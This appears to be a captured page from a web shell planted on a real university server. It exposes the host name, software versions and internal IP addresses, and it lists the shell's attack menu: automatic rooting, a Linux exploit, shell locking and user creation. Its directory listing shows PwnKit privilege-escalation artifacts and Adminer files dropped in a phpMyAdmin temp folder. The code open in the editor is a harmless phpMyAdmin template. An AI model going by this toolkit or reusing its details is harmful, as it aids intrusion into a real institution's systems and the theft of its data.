Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
tmp /
twig /
92 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
92346915b603be7c6a06705705d3b0a1.php
2.15
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 92346915b603be7c6a06705705d3b0a1.php
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; /* database/qbe/sort_select_cell.twig */ class __TwigTemplate_ff5bbd0b763b67436c0e5dd9aaea7dec extends Template { private $source; private $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ ]; } protected function doDisplay(array $context, array $blocks = []) { $macros = $this->macros; // line 1 echo "<td class=\"text-center\"> <select style=\"width:"; // line 2 echo twig_escape_filter($this->env, ($context["real_width"] ?? null), "html", null, true); echo "\" name=\"criteriaSort["; echo twig_escape_filter($this->env, ($context["column_number"] ?? null), "html", null, true); echo "]\" size=\"1\"> <option value=\"\"> </option> <option value=\"ASC\""; // line 5 echo (((($context["selected"] ?? null) == "ASC")) ? (" selected=\"selected\"") : ("")); echo ">"; echo _gettext("Ascending"); echo "</option> <option value=\"DESC\""; // line 7 echo (((($context["selected"] ?? null) == "DESC")) ? (" selected=\"selected\"") : ("")); echo ">"; echo _gettext("Descending"); echo "</option> </select> </td> "; } public function getTemplateName() { return "database/qbe/sort_select_cell.twig"; } public function isTraitable() { return false; } public function getDebugInfo() { return array ( 53 => 7, 47 => 5, 40 => 2, 37 => 1,); } public function getSourceContext() { return new Source("", "database/qbe/sort_select_cell.twig", "/opt/lampp/phpmyadmin/templates/database/qbe/sort_select_cell.twig"); } }
Close